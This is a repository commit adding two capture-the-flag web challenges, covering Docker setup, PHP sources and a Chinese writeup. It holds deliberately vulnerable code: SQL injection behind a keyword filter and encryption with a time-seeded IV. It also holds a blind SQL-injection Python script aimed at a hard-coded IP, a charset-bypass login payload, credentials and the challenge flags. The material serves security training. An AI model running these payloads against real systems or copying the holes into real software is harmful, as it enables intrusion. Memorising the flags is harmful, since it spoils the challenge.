add ctf file

web100-6/Dockerfile

@@ -0,0 +1,38 @@
+FROM ubuntu:16.04 
+MAINTAINER wonderkun <[email protected]>
+ENV DEBIAN_FRONTEND noninteractive 
+
+RUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list
+RUN TZ=Asia/shanghai 
+RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
+
+RUN apt-get update -y && \ 
+    apt-get install -y nginx \
+    php7.0-fpm \
+    php-mysql  \ 
+    mysql-client \
+    mysql-server  \
+    && /etc/init.d/mysql start \
+    && mysqladmin -uroot password root  \
+    && apt-get clean \
+    && rm -rf /var/lib/apt/lists/* 
+
+# 拷贝文件 
+WORKDIR  /tmp 
+COPY ./start.sh /tmp/
+RUN chmod a+x ./start.sh
+# 设置数据库
+
+RUN set -x \
+    && service mysql start \ 
+    && mysql  -e "CREATE DATABASE   ctf  DEFAULT CHARACTER SET latin1 ;"  -uroot  -proot \ 
+    &&  mysql -e "grant select,create,insert on ctf.* to 'admin'@'localhost' identified by 'thisisApass' "  -uroot -proot  
+
+# 复制源代码 
+COPY ./default  /etc/nginx/sites-available/default
+COPY ./src/    /usr/share/nginx/html/
+
+# 修改目录权限
+
+EXPOSE  80 3306 
+CMD ["/tmp/start.sh"]

web100-6/default

@@ -0,0 +1,17 @@
+server {
+
+
+    listen 80; 
+    root /usr/share/nginx/html;
+    index index.php index.html index.htm; 
+
+    server_name localhost; 
+    location ~ \.php$ {
+    include snippets/fastcgi-php.conf;
+
+# With php5-cgi alone:
+#fastcgi_pass 127.0.0.1:9000;
+# With php5-fpm:
+   fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
+   }
+}

web100-6/src/config.php

@@ -0,0 +1,11 @@
+<?php 
+
+error_reporting(0);
+
+$flag = "flag{e4d93a53bbe9a2f9c419086c16439aa7}";
+$dbhost = "127.0.0.1";
+$dbuser = "admin";
+$dbpass = "thisisApass";
+$dbname = "ctf";
+$install = @$_POST["wonderkun_install_this_project!"];
+$conn = mysqli_connect($dbhost,$dbuser,$dbpass,$dbname);

web100-6/src/index.php

@@ -0,0 +1,86 @@
+<?php 
+
+include("config.php");
+
+$conn ->query("set names utf8");
+
+function randStr($lenth=32){
+    $strBase = "1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm";
+    $str = "";
+    while($lenth>0){
+      $str.=substr($strBase,rand(0,strlen($strBase)-1),1);
+      $lenth --;
+    }
+   return $str;
+}
+
+if($install){
+    $sql = "create table `user` (
+         `id` int(10) unsigned NOT NULL PRIMARY KEY  AUTO_INCREMENT ,
+         `username` varchar(30) NOT NULL,
+         `passwd` varchar(32) NOT NULL,
+         `role` varchar(30) NOT NULL
+       )ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci ";
+    if($conn->query($sql)){
+       $sql  = "insert into `user`(`username`,`passwd`,`role`) values ('admin','".md5(randStr())."','admin')";
+       $conn -> query($sql);
+    }
+}
+
+function filter($str){
+     $filter = "/ |\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i"; 
+     if(preg_match($filter,$str)){
+         die("you can't input this illegal char!");
+     }
+     return $str; 
+
+}
+
+
+function show($username){
+  global $conn;
+  $sql = "select role from `user` where username ='".$username."'";
+  $res = $conn ->query($sql);
+  if($res->num_rows>0){
+
+      echo "$username is ".$res->fetch_assoc()['role'];
+  }else{
+      die("Don't have this user!");
+  }
+}
+
+function login($username,$passwd){
+    global $conn;
+    global $flag;
+
+    $username = trim(strtolower($username));
+    $passwd = trim(strtolower($passwd));
+    if($username == 'admin'){
+        die("you can't login this as admin!");
+    }
+
+    $sql = "select * from `user` where username='".$conn->escape_string($username)."' and passwd='".$conn->escape_string($passwd)."'";
+    $res = $conn ->query($sql);
+    if($res->num_rows>0){
+        if($res->fetch_assoc()['role'] === 'admin') exit($flag);
+    }else{
+       echo "sorry,username or passwd error!";  
+    }
+
+}
+
+function source(){
+
+    highlight_file(__FILE__);
+}
+
+$username = isset($_POST['username'])?filter($_POST['username']):"";
+$passwd = isset($_POST['passwd'])?filter($_POST['passwd']):"";
+
+$action = isset($_GET['action'])?filter($_GET['action']):"source";
+
+switch($action){
+   case "source": source(); break ;
+   case "login" : login($username,$passwd);break;
+   case "show" : show($username);break;
+}

web100-6/start.sh

@@ -0,0 +1,9 @@
+#!/bin/bash
+
+
+service nginx restart
+service php7.0-fpm start
+service mysql restart  
+
+
+/usr/bin/tail -f /dev/null

web100-6/writeup/getPasswd.py

@@ -0,0 +1,26 @@
+#!/usr/bin/python
+# coding:utf-8 
+
+import requests 
+
+def getPassword():
+    url = "http://117.34.111.15:89?action=show"
+    # data = {"username":}
+    username = "admin'^!(mid((passwd)from(-{pos}))='{passwd}')='1"
+    strBase = "1234567890abcdef"
+    passwd = ""
+    for k in range(1,34):
+        print passwd
+        for i in strBase:
+            passwdTmp = i+passwd
+            data = {"username":username.format(pos=str(k),passwd=passwdTmp)}
+
+            # print data
+            res = requests.post(url,data)
+            if "admin" in res.text:
+                passwd = passwdTmp
+                break  
+
+
+if __name__ == "__main__":
+    getPassword()

web100-6/writeup/writeup.md

@@ -0,0 +1,39 @@
+## web100 writeup 
+
+sql注入就不再多说了,不懂的看个题.
+[https://github.com/wonderkun/CTF_web/tree/master/web300-2](https://github.com/wonderkun/CTF_web/tree/master/web300-2)
+
+直接给出注出passwd的poc吧:
+```python
+#!/usr/bin/python
+# coding:utf-8 
+
+import requests 
+
+def getPassword():
+    url = "http://117.34.111.15:89?action=show"
+    # data = {"username":}
+    username = "admin'^!(mid((passwd)from(-{pos}))='{passwd}')='1"
+    strBase = "1234567890abcdef"
+    passwd = ""
+    for k in range(1,34):
+        print passwd
+        for i in strBase:
+            passwdTmp = i+passwd
+            data = {"username":username.format(pos=str(k),passwd=passwdTmp)}
+
+            # print data
+            res = requests.post(url,data)
+            if "admin" in res.text:
+                passwd = passwdTmp
+                break  
+
+
+if __name__ == "__main__":
+    getPassword()
+```
+最后用 mysql的utf-8字符编码问题,绕过对admin的判断,参考[https://www.leavesongs.com/PENETRATION/mysql-charset-trick.html](https://www.leavesongs.com/PENETRATION/mysql-charset-trick.html),最后post
+```
+username=Admin%c2&passwd=37b1d2f04f594bfffc826fd69e389688
+```
+拿到flag: flag{e4d93a53bbe9a2f9c419086c16439aa7} 

web300-1/Dockerfile

@@ -0,0 +1,44 @@
+FROM ubuntu:16.04 
+
+MAINTAINER wonderkun <[email protected]>
+ENV DEBIAN_FRONTEND noninteractive 
+
+RUN sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.list
+RUN TZ=Asia/shanghai 
+RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
+
+RUN apt-get update -y && \ 
+    apt-get install -y nginx \
+    vim \
+    tar \
+    php7.0-fpm \
+    php7.0-mcrypt \ 
+    php-mysql  \ 
+    mysql-client \
+    mysql-server   \
+    && /etc/init.d/mysql start \
+    && mysqladmin -uroot password root  \
+    && rm -rf /var/lib/apt/lists/* 
+
+WORKDIR /tmp  
+COPY  ./start.sh  /tmp/
+COPY  ./init.sql  /tmp/ 
+RUN  chmod a+x start.sh 
+
+#设置数据库 
+RUN set -x \
+    && service mysql start \ 
+    && mysql  -e "CREATE DATABASE  blog  DEFAULT CHARACTER SET utf8;"  -uroot  -proot \ 
+    &&  mysql -e "grant select,insert on blog.* to 'admin'@'localhost' identified by 'password' "  -uroot -proot   \ 
+    &&  mysql -e "use blog;source /tmp/init.sql;"  -uroot -proot \
+    && rm /tmp/init.sql 
+
+# copy 源码
+COPY  ./default /etc/nginx/sites-available/default
+COPY ./src /usr/share/nginx/html/
+
+# 设置可写权限 
+RUN chown -R  www-data:www-data /usr/share/nginx/html/ 
+EXPOSE 80 3306 
+
+CMD ["/tmp/start.sh"]

web300-1/default

@@ -0,0 +1,19 @@
+
+server {
+
+
+    listen 80; 
+    root /usr/share/nginx/html;
+    index index.php index.html index.htm; 
+
+    server_name localhost; 
+    location ~ \.php$ {
+    include snippets/fastcgi-php.conf;
+
+# With php5-cgi alone:
+#fastcgi_pass 127.0.0.1:9000;
+# With php5-fpm:
+   fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
+   }
+
+}

web300-1/src/backup_old.php

@@ -0,0 +1,5 @@
+<?php
+require_once('encrypt.php');
+file_put_contents('./backup.txt', token_encrypt(file_get_contents('./flag.txt')));
+
+?>

web300-1/src/db.php

@@ -0,0 +1,6 @@
+<?php
+define('DB_HOST', 'localhost');
+define('DB_USER', trim(file_get_contents('/etc/db-user')));
+define('DB_PASS',trim(file_get_contents('/etc/db-pass')));
+define('DB_DATABASE', 'blog');
+?>

web300-1/src/encrypt.php

@@ -0,0 +1,39 @@
+<?php
+
+require_once('key.php');
+
+define('BS', 16);
+
+function getRandChar($length){
+	$str = null;
+	$strPol = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
+	for($i=0;$i<$length;$i++){
+		$n = rand(0, strlen($strPol) - 1);
+		$str.=$strPol[$n];
+	}
+	return $str;
+}
+
+function pad($str) {
+	return $str . str_repeat(chr(BS - strlen($str) % BS), (BS - strlen($str) % BS));
+}
+
+function unpad($str) {
+	return substr($str, 0, -ord(substr($str, -1, 1)));
+}
+
+function token_encrypt($str) {
+	$key = get_key();
+	srand(time() / 300);
+	$iv = getRandChar(16);
+	return bin2hex(mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, pad($str), MCRYPT_MODE_CFB, $iv));
+}
+
+function token_decrypt($str) {
+	$key = get_key();
+	srand(time() / 300);
+	$iv = getRandChar(16);
+	return unpad(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, hex2bin($str), MCRYPT_MODE_CFB, $iv));
+}
+
+?>

web300-1/src/flag.txt

@@ -0,0 +1 @@
+flag{660b7b8c06e3150d174a3ec9fcd7ab9d}